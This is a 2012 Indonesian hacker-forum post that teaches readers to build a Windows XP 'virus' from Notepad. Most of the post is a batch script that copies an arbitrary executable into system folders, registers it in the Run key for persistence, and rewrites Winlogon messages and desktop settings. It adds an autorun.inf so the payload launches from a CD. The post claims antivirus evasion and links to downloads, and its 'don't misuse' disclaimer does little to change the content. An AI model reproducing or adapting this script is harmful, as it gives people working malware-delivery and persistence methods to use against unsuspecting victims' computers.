HNC ( Hackers Newbie Community )
Selamat Datang Di Forum Talk-take Yang Belum Punya ID silahkan [DAFTAR]Yang Sudah Punya ID Silahkan[LOGIN]bagi User yang tidak aktif maaf kamiDELETE

About me FB : luckyskw@rocketmail.com
About me Twitter : luckyskw@ymail.com

Hukumannya :
- Warn +1 "PERINGATAN'
- Warn +2 disable post 7 hari
- Warn +3 disable post 14 hari
- Warn +4 disable post 21 hari
- Warn +5 disable post 1 Bulan
- Warn +6 R.I.P (BanList)

by : ADMIN HNC
Moderators


FVCK, Hindari Budaya Copast tanpa mengatas namakan Sumber
 
IndeksCalendarFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 Bikin Virus Dari Notepad

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Admin
Admin
avatar

Jumlah posting : 19
Join date : 19.07.12
Age : 19
Lokasi : Pontianak

PostSubyek: Bikin Virus Dari Notepad   Fri Jul 27, 2012 10:17 am

ni virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus(setahu saya….. )

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…

note: “HANYA BEKERJA PADA WINDOWS XP”

caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish
ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe
%systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish
ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe
%systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish
ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe
%systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE
FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR
COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar
pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar
pembuat).bmp /f
reg add
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v
nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file
yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi
lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d
#000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f


- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat


- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb
klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya

note:
- jangan disalahgunakan
- maaf kalau pernah diposting
- maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir ….
- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi ….
- kalau mau buat anti virusnya tinggal di modifikasi nilainya….


Sumber : http://www.yogyafree.net/forum2/viewtopic.php?t=11281

Kalo mw model yang kaya gini mudah kok, bisa di liat langsung tpi bukan sejenis VIRUS,

WARNING !!!
BACA PERATURANNYA DULU :
Jangan Menggunakan VIA LEPTOP, HP, Perangkat lunak yang sudah tidak berfungsi,dll.
Hanya Permainan Semata, and
Jangan di gunakan utk hal yg tidak baik !

Download :
mediafire.com ?wfhqkk4c9lnoomn
http://www.ziddu.com/download/19995021/www.hackers-newbie-commu.forumid.net.zip.zip.html
Ingat Pass ny : www.hackers-newbie-commu.forumid.net
Kembali Ke Atas Go down
Lihat profil user http://hackers-newbie-commu.forumid.net
 
Bikin Virus Dari Notepad
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» kuras radiator sendiri
» [share] Caraku terhindar 100% dari Virus PC & Notebook ( No Deep Freeze )
» Tangki dari fiber
» Mau Nanya Neh APA BENER ADA SURAT JALAN SEMENTARA DARI NININ 250 R........................
» WTA cara bikin dudukan lampu custom di batok custom

Permissions in this forum:Anda tidak dapat menjawab topik
HNC ( Hackers Newbie Community ) :: ./Virus Notepad-
Navigasi: